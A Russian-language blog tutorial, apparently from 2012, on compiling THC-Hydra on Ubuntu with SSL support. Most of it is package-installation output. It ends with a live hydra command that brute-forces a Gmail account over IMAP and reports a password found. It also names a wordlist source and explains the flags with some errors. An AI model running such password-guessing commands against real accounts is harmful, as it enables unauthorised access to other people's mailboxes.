Установка THC-Hydra на Ubuntu 10.10 с поддержкой SSL

Posted by

Сейчас я покажу по шагам, как установить программу устранив зависимости, также где брать файлы с предполагаемыми паролями и осуществлю тестовый подбор к почтовому ящику.

Возможности данной программы:

– TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Исходная система:

keiz@vkeiz:~$ cat /etc/issue && uname -a

\n \l

Linux vkeiz 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:32:27 UTC 2010 x86_64 GNU/Linux

keiz@vkeiz:~$

Для последующей работы совместно с программой понадобится установить libssh-dev, проверяем наличие пакета в репозитариях.

keiz@vkeiz:~$ aptitude search libssh-dev

p libssh-dev — A tiny C SSH library. Development files

keiz@vkeiz:~$ aptitude show libssh-dev

Package: libssh-dev

State: not installed

Version: 0.4.5-1

 

устанавливаем его:

keiz@vkeiz:~$ sudo aptitude install libssh-dev

 

С сайта скачиваем последнюю версию пакета hydra:

keiz@vkeiz:~/hydra$ wget http://freeworld.thc.org/releases/hydra-7.2-src.tar.gz

—2012-06-21 13:53:55— http://freeworld.thc.org/releases/hydra-7.2-src.tar.gz

Resolving freeworld.thc.org… 199.58.210.16

Connecting to freeworld.thc.org|199.58.210.16|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 652142 (637K) [application/x-gzip]

Saving to: `hydra-7.2-src.tar.gz’

100%[======================================================================>] 652,142 21.2K/s in 24s

2012-06-21 13:54:19 (26.8 KB/s) — `hydra-7.2-src.tar.gz’ saved [652142/652142]

 

Для продолжения установки убедимся, что у нас стоят все утилиты разработки (в том числе библиотеки, компиляторы и файлы заголовков).

keiz@vkeiz:~/hydra$ sudo apt-get install build-essential linux-headers-$(uname -r) libgtk2.0-dev libssl-dev cmake

Reading package lists… Done

Building dependency tree

Reading state information… Done

linux-headers-2.6.35-22-generic is already the newest version.

linux-headers-2.6.35-22-generic set to manually installed.

Some packages could not be installed. This may mean that you have

requested an impossible situation or if you are using the unstable

distribution that some required packages have not yet been created

or been moved out of Incoming.

The following information may help to resolve the situation:

The following packages have unmet dependencies:

libssl-dev : Depends: libssl0.9.8 (= 0.9.8o-1ubuntu4) but 0.9.8o-1ubuntu4.1 is to be installed

E: Broken packages

keiz@vkeiz:~/hydra$

, вот и первая проблема, нужно устранить проблемы зависимостей:

 

keiz@vkeiz:~/hydra$ wget http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8o-1ubuntu4_amd64.deb—2012-06-21 14:00:52— http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8o-1ubuntu4_amd64.deb

Resolving security.ubuntu.com… 91.189.92.181, 91.189.92.184, 91.189.92.151, …

Connecting to security.ubuntu.com|91.189.92.181|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 406964 (397K) [application/x-debian-package]

Saving to: `openssl_0.9.8o-1ubuntu4_amd64.deb’

100%[======================================================================>] 406,964 123K/s in 3.2s

2012-06-21 14:01:05 (123 KB/s) — `openssl_0.9.8o-1ubuntu4_amd64.deb’ saved [406964/406964]

keiz@vkeiz:~/hydra$ wget http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8o-1ubuntu4.6_amd64.deb

—2012-06-21 14:01:09— http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8o-1ubuntu4.6_amd64.deb

Resolving security.ubuntu.com… 91.189.92.166, 91.189.92.181, 91.189.92.184, …

Connecting to security.ubuntu.com|91.189.92.166|:80… connected.

HTTP request sent, awaiting response… 200 OK

Length: 406006 (396K) [application/x-debian-package]

Saving to: `openssl_0.9.8o-1ubuntu4.6_amd64.deb’

100%[======================================================================>] 406,006 39.6K/s in 11s

2012-06-21 14:01:20 (36.8 KB/s) — `openssl_0.9.8o-1ubuntu4.6_amd64.deb’ saved [406006/406006]

 

ставим эти пакеты:

keiz@vkeiz:~/hydra$ sudo dpkg -i *.deb

(Reading database … 119953 files and directories currently installed.)

Preparing to replace openssl 0.9.8o-1ubuntu4.1 (using openssl_0.9.8o-1ubuntu4.6_amd64.deb) …

Unpacking replacement openssl …

Preparing to replace openssl 0.9.8o-1ubuntu4.6 (using openssl_0.9.8o-1ubuntu4_amd64.deb) …

Unpacking replacement openssl …

More than one copy of package openssl has been unpacked

in this run ! Only configuring it once.

Setting up openssl (0.9.8o-1ubuntu4) …

Processing triggers for man-db …

keiz@vkeiz:~/hydra$

 

Запустим снова проверку зависимостей:

keiz@vkeiz:~/hydra$ sudo apt-get install build-essential linux-headers-$(uname -r) libgtk2.0-dev libssl-dev cmake

Reading package lists… Done

Building dependency tree

Reading state information… Done

The following extra packages will be installed:

cmake-data cpp-4.4 debhelper dpkg-dev emacsen-common fakeroot g++ g++-4.4 gcc-4.4 gcc-4.4-base gettext

html2text intltool-debian libalgorithm-diff-perl libalgorithm-merge-perl libatk1.0-dev libcairo-gobject2

libcairo2-dev libdpkg-perl libexpat1-dev libfontconfig1-dev libfreetype6 libfreetype6-dev

libgdk-pixbuf2.0-dev libglib2.0-bin libglib2.0-dev libice-dev libmail-sendmail-perl libpango1.0-0

libpango1.0-common libpango1.0-dev libpixman-1-dev libpng12-0 libpng12-dev libpthread-stubs0

libpthread-stubs0-dev libsm-dev libssl0.9.8 libstdc++6-4.4-dev libsys-hostname-long-perl libunistring0

libx11-dev libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev

libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxmlrpc-core-c3

libxrandr-dev libxrender-dev patch po-debconf x11proto-composite-dev x11proto-core-dev x11proto-damage-dev

x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev

x11proto-xext-dev x11proto-xinerama-dev xtrans-dev zlib1g-dev

Suggested packages:

gcc-4.4-locales dh-make debian-keyring g++-multilib g++-4.4-multilib gcc-4.4-doc libstdc++6-4.4-dbg

gcc-4.4-multilib libmudflap0-4.4-dev libgcc1-dbg libgomp1-dbg libmudflap0-dbg libcloog-ppl0 libppl-c2

libppl7 gettext-doc libcairo2-doc libcairo-script-interpreter2 libglib2.0-doc python-subunit libgtk2.0-doc

ttf-japanese-mincho ttf-thryomanes ttf-baekmuk ttf-arphic-gbsn00lp ttf-arphic-bsmi00lp ttf-arphic-gkai00mp

ttf-arphic-bkai00mp libpango1.0-doc imagemagick libstdc++6-4.4-doc diffutils-doc libmail-box-perl

The following NEW packages will be installed:

build-essential cmake cmake-data debhelper dpkg-dev emacsen-common fakeroot g++ g++-4.4 gettext html2text

intltool-debian libalgorithm-diff-perl libalgorithm-merge-perl libatk1.0-dev libcairo-gobject2 libcairo2-dev

libdpkg-perl libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libglib2.0-bin

libglib2.0-dev libgtk2.0-dev libice-dev libmail-sendmail-perl libpango1.0-dev libpixman-1-dev libpng12-dev

libpthread-stubs0 libpthread-stubs0-dev libsm-dev libssl-dev libstdc++6-4.4-dev libsys-hostname-long-perl

libunistring0 libx11-dev libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev

libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev

libxmlrpc-core-c3 libxrandr-dev libxrender-dev patch po-debconf x11proto-composite-dev x11proto-core-dev

x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev

x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xtrans-dev zlib1g-dev

The following packages will be upgraded:

cpp-4.4 gcc-4.4 gcc-4.4-base libfreetype6 libpango1.0-0 libpango1.0-common libpng12-0 libssl0.9.8

linux-headers-2.6.35-22-generic

9 upgraded, 68 newly installed, 0 to remove and 206 not upgraded.

Need to get 44.4MB of archives.

After this operation, 111MB of additional disk space will be used.

Do you want to continue [Y/n]?

хм, что очень много всего системе надо для удовлетворения зависимостей. Ну в качестве теста поставим. Жмем Y. И ждемс. Все прошло хорошо, пора скомпилировать нашу скаченную программу:

 

Распаковываем дистрибутив с hydra:

keiz@vkeiz:~/hydra$ tar -xzf hydra-7.2-src.tar.gz

keiz@vkeiz:~/hydra$ cd hydra-7.2-src/

keiz@vkeiz:~/hydra/hydra-7.2-src$ ./configure

keiz@vkeiz:~/hydra/hydra-7.2-src$ make

keiz@vkeiz:~/hydra/hydra-7.2-src$ sudo make install

You are now ready to use Hydra. Type ./hydra -h to get syntax help. The GUI version can be started by running xhydra.

Попробует протестировать работу утилиты на примере подбора пароля для gmail-ящика с использованием IMAP:

keiz@vkeiz:~$ hydra -S -l <account_name>@gmail.com -p password.txt -V imap.gmail.com imap

Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak — for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-06-21 14:43:57

[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task

[DATA] attacking service imap on port 993

[ATTEMPT] target imap.gmail.com — login «<account_name>@gmail.com» — pass «<подобранный_пароль>» — 1 of 1 [child 0]

[993][imap] host: 173.194.71.108 login: «<account_name>@gmail.com password: <подобранный_пароль>

[STATUS] attack finished for imap.gmail.com (waiting for children to finish)

1 of 1 target successfuly completed, 1 valid password found

где:
-l имя пользователя (<account_name>)
-P словарь ftp://ftp.openwall.com/pub/wordlists/
-V адрес сервера для атаки,
imap — тип протокола.

Leave a Reply